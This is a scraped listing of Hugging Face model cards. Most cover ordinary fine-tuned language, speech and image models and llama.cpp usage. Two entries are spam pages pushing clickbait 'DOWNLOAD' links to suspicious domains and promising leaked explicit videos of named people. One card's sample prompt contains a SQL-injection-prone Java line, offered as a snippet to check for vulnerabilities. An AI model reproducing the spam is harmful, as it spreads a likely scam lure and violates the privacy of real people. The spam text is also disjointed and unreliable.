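The card ships no usage snippet, so here is a minimal inference sketch using the plain transformers API. The prompt is illustrative only (the Java-vulnerability focus is inferred from the repo name), and whether a chat template is available depends on the uploaded tokenizer.

```python
from transformers import AutoModelForCausalLM, AutoTokenizer

model_id = "barryallen16/Qwen2_5_1.5B_java_vul"
tokenizer = AutoTokenizer.from_pretrained(model_id)
model = AutoModelForCausalLM.from_pretrained(model_id, device_map="auto")

# Illustrative prompt; the task framing is an assumption based on the repo name.
messages = [{"role": "user", "content": 'Is this Java snippet vulnerable? String q = "SELECT * FROM t WHERE id=" + userInput;'}]
inputs = tokenizer.apply_chat_template(messages, add_generation_prompt=True, return_tensors="pt").to(model.device)
outputs = model.generate(inputs, max_new_tokens=128)
print(tokenizer.decode(outputs[0][inputs.shape[-1]:], skip_special_tokens=True))
```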
meldynamics/whisper-large-v3-turbo-lithuanian-lithuania-0.06-cer-filtered-ggml
meldynamics
2025-06-11T10:38:01Z
0
0
null
[ "lt", "base_model:openai/whisper-large-v3-turbo", "base_model:finetune:openai/whisper-large-v3-turbo", "region:us" ]
null
2025-06-11T10:31:47Z
--- language: - lt base_model: - openai/whisper-large-v3-turbo --- # GGML version of [whisper-large-v3-turbo-lithuanian-lithuania-0.06-cer-filtered](https://huggingface.co/SamuelPfisterer1/whisper-large-v3-turbo-lithuanian-lithuania-0.06-cer-filtered)
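Because this is a GGML export, it targets whisper.cpp rather than transformers. A minimal transcription sketch follows; the model and audio filenames are assumptions (use whichever `.bin` file this repo actually ships), whisper.cpp expects 16 kHz WAV input, and `-l lt` selects Lithuanian.

```bash
# Transcribe a 16 kHz WAV file with whisper.cpp (filenames are assumptions)
./main -m ggml-model.bin -f sample.wav -l lt
```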
ibrahimbukhariLingua/qwen2.5-7b-en-wikipedia-finance-1000-v4
ibrahimbukhariLingua
2025-06-11T10:36:48Z
0
0
transformers
[ "transformers", "safetensors", "generated_from_trainer", "trl", "sft", "base_model:Qwen/Qwen2.5-7B-Instruct", "base_model:finetune:Qwen/Qwen2.5-7B-Instruct", "endpoints_compatible", "region:us" ]
null
2025-06-11T10:36:29Z
--- base_model: Qwen/Qwen2.5-7B-Instruct library_name: transformers model_name: qwen2.5-7b-en-wikipedia-finance-1000-v4 tags: - generated_from_trainer - trl - sft licence: license --- # Model Card for qwen2.5-7b-en-wikipedia-finance-1000-v4 This model is a fine-tuned version of [Qwen/Qwen2.5-7B-Instruct](https://huggingface.co/Qwen/Qwen2.5-7B-Instruct). It has been trained using [TRL](https://github.com/huggingface/trl). ## Quick start ```python from transformers import pipeline question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?" generator = pipeline("text-generation", model="ibrahimbukhariLingua/qwen2.5-7b-en-wikipedia-finance-1000-v4", device="cuda") output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0] print(output["generated_text"]) ``` ## Training procedure This model was trained with SFT. ### Framework versions - TRL: 0.18.1 - Transformers: 4.52.4 - Pytorch: 2.7.1 - Datasets: 3.6.0 - Tokenizers: 0.21.1 ## Citations Cite TRL as: ```bibtex @misc{vonwerra2022trl, title = {{TRL: Transformer Reinforcement Learning}}, author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec}, year = 2020, journal = {GitHub repository}, publisher = {GitHub}, howpublished = {\url{https://github.com/huggingface/trl}} } ```
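The training-procedure section states only that SFT was used. As a sketch of what that looks like with the listed TRL version, the following is a minimal example, not the authors' actual script; the dataset, output directory, and step count are placeholders.

```python
from datasets import Dataset
from trl import SFTConfig, SFTTrainer

# Placeholder corpus; the real finance training data is not published on the card.
train_dataset = Dataset.from_dict({
    "text": ["Q: What is EBITDA?\nA: Earnings before interest, taxes, depreciation and amortization."]
})

trainer = SFTTrainer(
    model="Qwen/Qwen2.5-7B-Instruct",  # the stated base model
    train_dataset=train_dataset,
    args=SFTConfig(output_dir="qwen2.5-7b-finance-sft", max_steps=10),
)
trainer.train()
```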
FarParsley4803/billie
FarParsley4803
2025-06-11T10:35:44Z
0
0
null
[ "region:us" ]
null
2025-06-11T10:33:50Z
🔴 ➤►DOWNLOAD👉👉🟢 ➤ <a href="https://subwayreh.cfd/wesrd">🌐(Full Original OMG video billie eilish & nat wolff! Leak Photos and video)
nishantbadhautiya/distilgpt2-finetuned-wikitext2
nishantbadhautiya
2025-06-11T10:34:26Z
0
0
transformers
[ "transformers", "tensorboard", "safetensors", "gpt2", "text-generation", "generated_from_trainer", "base_model:distilbert/distilgpt2", "base_model:finetune:distilbert/distilgpt2", "license:apache-2.0", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-06-11T10:03:40Z
--- library_name: transformers license: apache-2.0 base_model: distilgpt2 tags: - generated_from_trainer model-index: - name: distilgpt2-finetuned-wikitext2 results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> # distilgpt2-finetuned-wikitext2 This model is a fine-tuned version of [distilgpt2](https://huggingface.co/distilgpt2) on an unknown dataset. It achieves the following results on the evaluation set: - Loss: 3.6425 ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 2e-05 - train_batch_size: 8 - eval_batch_size: 8 - seed: 42 - optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments - lr_scheduler_type: linear - num_epochs: 3.0 ### Training results | Training Loss | Epoch | Step | Validation Loss | |:-------------:|:-----:|:----:|:---------------:| | 3.7194 | 1.0 | 2334 | 3.6663 | | 3.6195 | 2.0 | 4668 | 3.6462 | | 3.5733 | 3.0 | 7002 | 3.6425 | ### Framework versions - Transformers 4.52.4 - Pytorch 2.6.0+cu124 - Datasets 3.6.0 - Tokenizers 0.21.1
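Because this is a causal language model evaluated with cross-entropy loss, the reported eval loss converts directly to perplexity via exp(loss); the final loss of 3.6425 corresponds to a validation perplexity of roughly 38.2:

```python
import math

eval_loss = 3.6425          # final validation loss from the table above
print(math.exp(eval_loss))  # ≈ 38.19, i.e. a perplexity of about 38.2
```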
Triangle104/Huihui-MoE-1B-A0.6B-Q8_0-GGUF
Triangle104
2025-06-11T10:34:12Z
0
0
transformers
[ "transformers", "gguf", "moe", "llama-cpp", "gguf-my-repo", "text-generation", "base_model:huihui-ai/Huihui-MoE-1B-A0.6B", "base_model:quantized:huihui-ai/Huihui-MoE-1B-A0.6B", "license:apache-2.0", "endpoints_compatible", "region:us" ]
text-generation
2025-06-11T10:33:56Z
---
license: apache-2.0
base_model: huihui-ai/Huihui-MoE-1B-A0.6B
library_name: transformers
license_link: https://huggingface.co/Qwen/Qwen3-0.6B/blob/main/LICENSE
pipeline_tag: text-generation
tags:
- moe
- llama-cpp
- gguf-my-repo
---

# Triangle104/Huihui-MoE-1B-A0.6B-Q8_0-GGUF
This model was converted to GGUF format from [`huihui-ai/Huihui-MoE-1B-A0.6B`](https://huggingface.co/huihui-ai/Huihui-MoE-1B-A0.6B) using llama.cpp via ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space.
Refer to the [original model card](https://huggingface.co/huihui-ai/Huihui-MoE-1B-A0.6B) for more details on the model.

## Use with llama.cpp
Install llama.cpp via brew (works on Mac and Linux):

```bash
brew install llama.cpp
```
Invoke the llama.cpp server or the CLI.

### CLI:
```bash
llama-cli --hf-repo Triangle104/Huihui-MoE-1B-A0.6B-Q8_0-GGUF --hf-file huihui-moe-1b-a0.6b-q8_0.gguf -p "The meaning to life and the universe is"
```

### Server:
```bash
llama-server --hf-repo Triangle104/Huihui-MoE-1B-A0.6B-Q8_0-GGUF --hf-file huihui-moe-1b-a0.6b-q8_0.gguf -c 2048
```

Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the Llama.cpp repo.

Step 1: Clone llama.cpp from GitHub.
```
git clone https://github.com/ggerganov/llama.cpp
```

Step 2: Move into the llama.cpp folder and build it with the `LLAMA_CURL=1` flag along with other hardware-specific flags (e.g., LLAMA_CUDA=1 for Nvidia GPUs on Linux).
```
cd llama.cpp && LLAMA_CURL=1 make
```

Step 3: Run inference through the main binary.
```
./llama-cli --hf-repo Triangle104/Huihui-MoE-1B-A0.6B-Q8_0-GGUF --hf-file huihui-moe-1b-a0.6b-q8_0.gguf -p "The meaning to life and the universe is"
```
or
```
./llama-server --hf-repo Triangle104/Huihui-MoE-1B-A0.6B-Q8_0-GGUF --hf-file huihui-moe-1b-a0.6b-q8_0.gguf -c 2048
```
albertuspekerti/whispertiny_fruit25syl_v4
albertuspekerti
2025-06-11T10:33:54Z
0
0
null
[ "tensorboard", "safetensors", "whisper", "generated_from_trainer", "base_model:openai/whisper-tiny", "base_model:finetune:openai/whisper-tiny", "license:apache-2.0", "region:us" ]
null
2025-06-11T07:15:26Z
--- license: apache-2.0 base_model: openai/whisper-tiny tags: - generated_from_trainer metrics: - wer model-index: - name: whispertiny_fruit25syl_v4 results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> # whispertiny_fruit25syl_v4 This model is a fine-tuned version of [openai/whisper-tiny](https://huggingface.co/openai/whisper-tiny) on an unknown dataset. It achieves the following results on the evaluation set: - Loss: 0.0374 - Wer: 6.2478 ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 1e-05 - train_batch_size: 16 - eval_batch_size: 8 - seed: 42 - optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08 - lr_scheduler_type: linear - lr_scheduler_warmup_steps: 500 - training_steps: 36000 - mixed_precision_training: Native AMP ### Training results | Training Loss | Epoch | Step | Validation Loss | Wer | |:-------------:|:------:|:-----:|:---------------:|:-------:| | 0.089 | 0.0556 | 2000 | 1.2236 | 47.3019 | | 0.0835 | 0.1111 | 4000 | 0.1329 | 17.4939 | | 0.1248 | 0.1667 | 6000 | 0.1373 | 14.6178 | | 0.1632 | 0.2222 | 8000 | 0.9112 | 42.7714 | | 0.0491 | 0.2778 | 10000 | 0.4560 | 36.9773 | | 0.056 | 0.3333 | 12000 | 0.1123 | 10.3316 | | 0.0373 | 0.3889 | 14000 | 1.4490 | 51.2600 | | 0.0107 | 0.4444 | 16000 | 0.7076 | 39.3159 | | 0.0345 | 1.0049 | 18000 | 0.0647 | 6.7365 | | 0.0159 | 1.0605 | 20000 | 0.7125 | 32.8935 | | 0.004 | 1.1161 | 22000 | 1.1897 | 43.9372 | | 0.0074 | 1.1716 | 24000 | 0.0466 | 6.0244 | | 0.0023 | 1.2272 | 26000 | 0.7663 | 34.8970 | | 0.0044 | 1.2827 | 28000 | 0.5099 | 31.9442 | | 0.0065 | 1.3383 | 30000 | 0.0191 | 2.5899 | | 0.0007 | 1.3938 | 32000 | 0.5589 | 30.4433 | | 0.0006 | 1.4494 | 34000 | 0.3183 | 23.8743 | | 0.0472 | 2.0099 | 36000 | 0.0374 | 6.2478 | ### Framework versions - Transformers 4.41.2 - Pytorch 2.3.0+cu121 - Datasets 2.19.1 - Tokenizers 0.19.1
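The card reports training metrics but no inference example. A minimal sketch with the transformers ASR pipeline follows; the audio path is a placeholder.

```python
from transformers import pipeline

asr = pipeline("automatic-speech-recognition", model="albertuspekerti/whispertiny_fruit25syl_v4")
print(asr("sample.wav")["text"])  # "sample.wav" is a placeholder path
```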
LongJumping/Whitne
LongJumping
2025-06-11T10:32:50Z
0
0
null
[ "region:us" ]
null
2025-06-11T10:23:01Z
Watch 🟢 ➤ ➤ ➤ 🌐<a href="https://ahdnews.cfd/AWFSF">Full Original Video bu guru salsa bu guru salsa tiktok</a> 🔴 ➤►DOWNLOAD👉👉🟢 ➤ 🌐<a href="https://ahdnews.cfd/AWFSF">(Full Original Video bu guru salsa bu guru salsa tiktok)</a> 🔴 ➤►DOWNLOAD👉👉🟢 ➤ <a href="https://ahdnews.cfd/AWFSF">🌐(Full Original Video bu guru salsa bu guru salsa tiktok)</a>

Full Original Video bu guru salsa bu guru salsa tiktok bu guru salsa Viral Video Full Original Video Viral link On Social Media X TikTok Trending Now

New Viral Video Original Video Link Leaked Original Video Viral On Social Media took the internet by storm and amazed viewers on various social media platforms.

Who Is Viral? TikTok Star Deactivates Social Media Accounts After Private Video Leaks Online. TikToker Viral is currently facing intense trolling after her explicit videos went viral on social media.

Viral Video Original Video Link Leaked video took the internet by storm and amazed viewers on various social media platforms. Viral Video Original Video Link Leaked, a young and talented digital creator, recently became famous thanks to this interesting video.

The Viral Video Original Video Link 2024 viral video serves as a testament to the power of social media to amplify voices and spark change. It highlights the importance of authentic storytelling and the ability to connect with audiences on a deep emotional level. As the video continues to inspire and empower viewers, Viral Video Original Video Link's legacy as a viral sensation and advocate for [relevant social issue] will undoubtedly endure.

The Viral Video on Twitter has garnered immense attention across social media platforms. This article aims to guide you on how to watch the video safely and responsibly.

I understand that you want to know more about that viral video, but I have to remind you to be careful when searching for and sharing content that involves other people's privacy, especially when it concerns private matters or could harm the people involved. A video that goes viral can often have a major impact on those involved, both positive and negative. If you are curious or want to learn more about the impact of social media, or even want to talk about online ethics, I can help explain further. But as for the video and the related links you mentioned, I suggest avoiding spreading them, out of respect for the privacy of everyone involved.

In addition, on YouTube there is a video titled "ORA PAKDE AMPUN PAKDE V1R4L T1KT0K" uploaded by Puthjeck666. It shows a compilation of funny moments set to trending background music, with the phrase "ampun pakde" serving as a kind of punchline. On Facebook the phrase is also used in various content, as seen in a video uploaded by Selin Kayra titled "Ampun Pakde #Reals #Fyp #Fbpro #Viral", which shows laughter-inducing scenes that end with the expression "ampun pakde". Although the phrase's popularity is rising, information about the true origin and meaning of "ampun pakde" remains limited. Even so, its use in a wide range of humorous content shows that "ampun pakde" has become part of a popular-culture trend on Indonesian social media.

Watch full viral ampun pakde video

In recent hours an intimate video of the adult content creator, who is also a contestant on the current reality show Isla de las Tentaciones, has brought her strong controversy after the intimate video with the actor Miiki León was leaked. According to several of her followers online, the leak occurred after the contestant told Marina López that her boyfriend Fran had been unfaithful to her before she went on the program, and that on repeated occasions he had sex behind Ana's back.

Where can Ana Luiza's leaked video be seen? Olivia Romano's video is circulating on social networks, mainly on adult content sites, where Ana Luiza and Miiky León are shown having a sexual encounter in a room. The material was initially leaked on the Super Por platform, where the clip was posted with a description that suggests it is quite explicit; although the clip is not complete, it has been enough to put Ana Luiza's name in the spotlight.

Is Ana Luiza's leaked video real? Although some internet users question the authenticity of the material, it could be real, since Ana Luiza, better known as OliviaRoomano, is a popular content creator on OnlyFans. That is why everyone suggests this is indeed a genuine leak and that the clip circulating on social networks is real. It should be noted that leaking explicit content without the consent of the people involved is punishable by law, with years in prison and fines.

How to see OliviaRoomano's leaked clip? Following the spread of the explicit material, multiple links claiming to contain the content creators' intimate video have begun to appear; however, it is important to take precautions before accessing this material.
lindsaybordier/DPO_final-dataset_not-robust_acc1_beta0.10
lindsaybordier
2025-06-11T10:32:02Z
0
0
transformers
[ "transformers", "safetensors", "qwen3", "text-generation", "generated_from_trainer", "trl", "dpo", "conversational", "arxiv:2305.18290", "base_model:Qwen/Qwen3-0.6B-Base", "base_model:finetune:Qwen/Qwen3-0.6B-Base", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-06-11T08:38:09Z
--- base_model: Qwen/Qwen3-0.6B-Base library_name: transformers model_name: DPO_final-dataset_not-robust_acc1_beta0.10 tags: - generated_from_trainer - trl - dpo licence: license --- # Model Card for DPO_final-dataset_not-robust_acc1_beta0.10 This model is a fine-tuned version of [Qwen/Qwen3-0.6B-Base](https://huggingface.co/Qwen/Qwen3-0.6B-Base). It has been trained using [TRL](https://github.com/huggingface/trl). ## Quick start ```python from transformers import pipeline question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?" generator = pipeline("text-generation", model="lindsaybordier/DPO_final-dataset_not-robust_acc1_beta0.10", device="cuda") output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0] print(output["generated_text"]) ``` ## Training procedure [<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/lindsaybordier-epfl/MNLP_DPO_M3/runs/uuct020b) This model was trained with DPO, a method introduced in [Direct Preference Optimization: Your Language Model is Secretly a Reward Model](https://huggingface.co/papers/2305.18290). ### Framework versions - TRL: 0.18.1 - Transformers: 4.51.3 - Pytorch: 2.7.1 - Datasets: 3.6.0 - Tokenizers: 0.21.1 ## Citations Cite DPO as: ```bibtex @inproceedings{rafailov2023direct, title = {{Direct Preference Optimization: Your Language Model is Secretly a Reward Model}}, author = {Rafael Rafailov and Archit Sharma and Eric Mitchell and Christopher D. Manning and Stefano Ermon and Chelsea Finn}, year = 2023, booktitle = {Advances in Neural Information Processing Systems 36: Annual Conference on Neural Information Processing Systems 2023, NeurIPS 2023, New Orleans, LA, USA, December 10 - 16, 2023}, url = {http://papers.nips.cc/paper_files/paper/2023/hash/a85b405ed65c6477a4fe8302b5e06ce7-Abstract-Conference.html}, editor = {Alice Oh and Tristan Naumann and Amir Globerson and Kate Saenko and Moritz Hardt and Sergey Levine}, } ``` Cite TRL as: ```bibtex @misc{vonwerra2022trl, title = {{TRL: Transformer Reinforcement Learning}}, author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec}, year = 2020, journal = {GitHub repository}, publisher = {GitHub}, howpublished = {\url{https://github.com/huggingface/trl}} } ```
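The quick start above covers inference only. For the training side, the following is a minimal TRL sketch using β = 0.10 to match the repo name; the preference pairs and hyperparameters are placeholders, not the dataset or settings actually used.

```python
from datasets import Dataset
from transformers import AutoModelForCausalLM, AutoTokenizer
from trl import DPOConfig, DPOTrainer

model_id = "Qwen/Qwen3-0.6B-Base"  # the stated base model
model = AutoModelForCausalLM.from_pretrained(model_id)
tokenizer = AutoTokenizer.from_pretrained(model_id)

# Placeholder preference pairs; the real dataset is not identified on the card.
train_dataset = Dataset.from_dict({
    "prompt": ["What is 2 + 2?"],
    "chosen": ["2 + 2 = 4."],
    "rejected": ["2 + 2 = 5."],
})

trainer = DPOTrainer(
    model=model,
    processing_class=tokenizer,
    train_dataset=train_dataset,
    args=DPOConfig(output_dir="dpo-qwen3-0.6b", beta=0.10, max_steps=10),
)
trainer.train()
```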
Triangle104/Huihui-MoE-1B-A0.6B-Q6_K-GGUF
Triangle104
2025-06-11T10:31:45Z
0
0
transformers
[ "transformers", "gguf", "moe", "llama-cpp", "gguf-my-repo", "text-generation", "base_model:huihui-ai/Huihui-MoE-1B-A0.6B", "base_model:quantized:huihui-ai/Huihui-MoE-1B-A0.6B", "license:apache-2.0", "endpoints_compatible", "region:us" ]
text-generation
2025-06-11T10:31:38Z
--- license: apache-2.0 base_model: huihui-ai/Huihui-MoE-1B-A0.6B library_name: transformers license_link: https://huggingface.co/Qwen/Qwen3-0.6B/blob/main/LICENSE pipeline_tag: text-generation tags: - moe - llama-cpp - gguf-my-repo ---

# Triangle104/Huihui-MoE-1B-A0.6B-Q6_K-GGUF
This model was converted to GGUF format from [`huihui-ai/Huihui-MoE-1B-A0.6B`](https://huggingface.co/huihui-ai/Huihui-MoE-1B-A0.6B) using llama.cpp via ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space.
Refer to the [original model card](https://huggingface.co/huihui-ai/Huihui-MoE-1B-A0.6B) for more details on the model.

## Use with llama.cpp
Install llama.cpp through brew (works on Mac and Linux):

```bash
brew install llama.cpp
```

Invoke the llama.cpp server or the CLI.

### CLI:
```bash
llama-cli --hf-repo Triangle104/Huihui-MoE-1B-A0.6B-Q6_K-GGUF --hf-file huihui-moe-1b-a0.6b-q6_k.gguf -p "The meaning to life and the universe is"
```

### Server:
```bash
llama-server --hf-repo Triangle104/Huihui-MoE-1B-A0.6B-Q6_K-GGUF --hf-file huihui-moe-1b-a0.6b-q6_k.gguf -c 2048
```

Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the llama.cpp repo.

Step 1: Clone llama.cpp from GitHub.
```
git clone https://github.com/ggerganov/llama.cpp
```

Step 2: Move into the llama.cpp folder and build it with the `LLAMA_CURL=1` flag along with other hardware-specific flags (for example, `LLAMA_CUDA=1` for Nvidia GPUs on Linux).
```
cd llama.cpp && LLAMA_CURL=1 make
```

Step 3: Run inference through the main binary.
```
./llama-cli --hf-repo Triangle104/Huihui-MoE-1B-A0.6B-Q6_K-GGUF --hf-file huihui-moe-1b-a0.6b-q6_k.gguf -p "The meaning to life and the universe is"
```
or
```
./llama-server --hf-repo Triangle104/Huihui-MoE-1B-A0.6B-Q6_K-GGUF --hf-file huihui-moe-1b-a0.6b-q6_k.gguf -c 2048
```
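Beyond the shell commands above, the same GGUF file can be used from Python. A minimal sketch (not part of the original card), assuming a recent `llama-cpp-python` release that provides the `Llama.from_pretrained` helper and that `huggingface_hub` is installed:

```python
from llama_cpp import Llama

# Downloads the GGUF file from the Hub on first use, then loads it.
llm = Llama.from_pretrained(
    repo_id="Triangle104/Huihui-MoE-1B-A0.6B-Q6_K-GGUF",
    filename="huihui-moe-1b-a0.6b-q6_k.gguf",
    n_ctx=2048,  # context size, matching the -c 2048 used above
)

out = llm("The meaning to life and the universe is", max_tokens=64)
print(out["choices"][0]["text"])
```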
neurospin/resnet18-stl10
neurospin
2025-06-11T10:30:27Z
0
0
null
[ "license:other", "region:us" ]
null
2025-06-11T08:51:57Z
--- license: other license_name: cecill-b license_link: https://cecill.info/licences.fr.html --- Weights used in the "Self-Supervised Contrastive Learning with SimCLR" nidl tutorial.
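The card gives no loading snippet. A minimal sketch, assuming the repository stores a plain PyTorch `state_dict`; the filename `resnet18.pth` below is a placeholder, so check the repository's file list for the actual name:

```python
import torch
from huggingface_hub import hf_hub_download
from torchvision.models import resnet18

# Hypothetical filename: inspect the repo to find the real checkpoint name.
ckpt_path = hf_hub_download(repo_id="neurospin/resnet18-stl10", filename="resnet18.pth")

model = resnet18(num_classes=10)  # STL-10 has 10 classes
state = torch.load(ckpt_path, map_location="cpu")
# strict=False tolerates extra keys (e.g. a SimCLR projection head) in the checkpoint.
model.load_state_dict(state, strict=False)
model.eval()
```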
ssanidhya0407/newsviallm-embeddings
ssanidhya0407
2025-06-11T10:28:36Z
0
0
null
[ "license:apache-2.0", "region:us" ]
null
2025-06-11T10:27:18Z
--- license: apache-2.0 ---
Triangle104/Huihui-MoE-1B-A0.6B-Q4_K_S-GGUF
Triangle104
2025-06-11T10:28:36Z
0
0
transformers
[ "transformers", "gguf", "moe", "llama-cpp", "gguf-my-repo", "text-generation", "base_model:huihui-ai/Huihui-MoE-1B-A0.6B", "base_model:quantized:huihui-ai/Huihui-MoE-1B-A0.6B", "license:apache-2.0", "endpoints_compatible", "region:us" ]
text-generation
2025-06-11T10:28:24Z
--- license: apache-2.0 base_model: huihui-ai/Huihui-MoE-1B-A0.6B library_name: transformers license_link: https://huggingface.co/Qwen/Qwen3-0.6B/blob/main/LICENSE pipeline_tag: text-generation tags: - moe - llama-cpp - gguf-my-repo ---

# Triangle104/Huihui-MoE-1B-A0.6B-Q4_K_S-GGUF
This model was converted to GGUF format from [`huihui-ai/Huihui-MoE-1B-A0.6B`](https://huggingface.co/huihui-ai/Huihui-MoE-1B-A0.6B) using llama.cpp via ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space.
Refer to the [original model card](https://huggingface.co/huihui-ai/Huihui-MoE-1B-A0.6B) for more details on the model.

## Use with llama.cpp
Install llama.cpp through brew (works on Mac and Linux):

```bash
brew install llama.cpp
```

Invoke the llama.cpp server or the CLI.

### CLI:
```bash
llama-cli --hf-repo Triangle104/Huihui-MoE-1B-A0.6B-Q4_K_S-GGUF --hf-file huihui-moe-1b-a0.6b-q4_k_s.gguf -p "The meaning to life and the universe is"
```

### Server:
```bash
llama-server --hf-repo Triangle104/Huihui-MoE-1B-A0.6B-Q4_K_S-GGUF --hf-file huihui-moe-1b-a0.6b-q4_k_s.gguf -c 2048
```

Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the llama.cpp repo.

Step 1: Clone llama.cpp from GitHub.
```
git clone https://github.com/ggerganov/llama.cpp
```

Step 2: Move into the llama.cpp folder and build it with the `LLAMA_CURL=1` flag along with other hardware-specific flags (for example, `LLAMA_CUDA=1` for Nvidia GPUs on Linux).
```
cd llama.cpp && LLAMA_CURL=1 make
```

Step 3: Run inference through the main binary.
```
./llama-cli --hf-repo Triangle104/Huihui-MoE-1B-A0.6B-Q4_K_S-GGUF --hf-file huihui-moe-1b-a0.6b-q4_k_s.gguf -p "The meaning to life and the universe is"
```
or
```
./llama-server --hf-repo Triangle104/Huihui-MoE-1B-A0.6B-Q4_K_S-GGUF --hf-file huihui-moe-1b-a0.6b-q4_k_s.gguf -c 2048
```
BootesVoid/cmbrrit13048gh4x52lbb2qmx_cmbrrr8xs048vh4x5hco75vyp
BootesVoid
2025-06-11T10:26:42Z
0
0
diffusers
[ "diffusers", "flux", "lora", "replicate", "text-to-image", "en", "base_model:black-forest-labs/FLUX.1-dev", "base_model:adapter:black-forest-labs/FLUX.1-dev", "license:other", "region:us" ]
text-to-image
2025-06-11T10:26:40Z
--- license: other license_name: flux-1-dev-non-commercial-license license_link: https://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/LICENSE.md language: - en tags: - flux - diffusers - lora - replicate base_model: "black-forest-labs/FLUX.1-dev" pipeline_tag: text-to-image # widget: # - text: >- # prompt # output: # url: https://... instance_prompt: OS11 --- # Cmbrrit13048Gh4X52Lbb2Qmx_Cmbrrr8Xs048Vh4X5Hco75Vyp <Gallery /> ## About this LoRA This is a [LoRA](https://replicate.com/docs/guides/working-with-loras) for the FLUX.1-dev text-to-image model. It can be used with diffusers or ComfyUI. It was trained on [Replicate](https://replicate.com/) using AI toolkit: https://replicate.com/ostris/flux-dev-lora-trainer/train ## Trigger words You should use `OS11` to trigger the image generation. ## Run this LoRA with an API using Replicate ```py import replicate input = { "prompt": "OS11", "lora_weights": "https://huggingface.co/BootesVoid/cmbrrit13048gh4x52lbb2qmx_cmbrrr8xs048vh4x5hco75vyp/resolve/main/lora.safetensors" } output = replicate.run( "black-forest-labs/flux-dev-lora", input=input ) for index, item in enumerate(output): with open(f"output_{index}.webp", "wb") as file: file.write(item.read()) ``` ## Use it with the [🧨 diffusers library](https://github.com/huggingface/diffusers) ```py from diffusers import AutoPipelineForText2Image import torch pipeline = AutoPipelineForText2Image.from_pretrained('black-forest-labs/FLUX.1-dev', torch_dtype=torch.float16).to('cuda') pipeline.load_lora_weights('BootesVoid/cmbrrit13048gh4x52lbb2qmx_cmbrrr8xs048vh4x5hco75vyp', weight_name='lora.safetensors') image = pipeline('OS11').images[0] ``` For more details, including weighting, merging and fusing LoRAs, check the [documentation on loading LoRAs in diffusers](https://huggingface.co/docs/diffusers/main/en/using-diffusers/loading_adapters) ## Training details - Steps: 2000 - Learning rate: 0.0004 - LoRA rank: 16 ## Contribute your own examples You can use the [community tab](https://huggingface.co/BootesVoid/cmbrrit13048gh4x52lbb2qmx_cmbrrr8xs048vh4x5hco75vyp/discussions) to add images that show off what you’ve made with this LoRA.
barryallen16/Qwen2_5_0B_java_vul
barryallen16
2025-06-11T10:26:38Z
0
0
transformers
[ "transformers", "safetensors", "text-generation-inference", "unsloth", "qwen2", "trl", "en", "license:apache-2.0", "endpoints_compatible", "region:us" ]
null
2025-06-11T10:26:07Z
--- base_model: unsloth/qwen2.5-coder-0.5b-instruct-bnb-4bit tags: - text-generation-inference - transformers - unsloth - qwen2 - trl license: apache-2.0 language: - en ---

# Uploaded model

- **Developed by:** barryallen16
- **License:** apache-2.0
- **Finetuned from model:** unsloth/qwen2.5-coder-0.5b-instruct-bnb-4bit

This qwen2 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Hugging Face's TRL library.

[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
Rif010/mmgpt-burmese-fine-tuned-adapter-v2
Rif010
2025-06-11T10:26:20Z
0
0
transformers
[ "transformers", "safetensors", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
null
2025-06-11T10:26:13Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> 